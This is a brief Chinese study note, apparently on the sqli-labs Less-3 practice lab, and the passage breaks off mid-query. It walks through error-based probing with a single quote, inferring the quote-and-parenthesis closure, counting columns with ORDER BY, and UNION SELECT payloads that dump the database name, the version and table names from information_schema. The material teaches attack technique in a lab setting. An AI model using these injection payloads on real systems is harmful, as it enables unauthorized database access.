本文为学习笔记,仅限学习交流
不得利用、从事危害国家或人民安全、荣誉和利益等活动
http://127.0.0.1/sqli/Less-3/?id=1
输入?Id=1’后报错
根据报错信息“1”)
去掉前后两个单引号,和自己输入的一个单引号后还有两个单引号和一个括号,可推出sql注入中的由单引号和括号的闭合模式。
order by 3 查看显示位
(3)并不是固定的,要去试的
union select 查询显示位
联合查询语句:Union select 1,database(),version() 查询当前数据库名及版本号
union select 1,group_concat(table_name),3 from information_s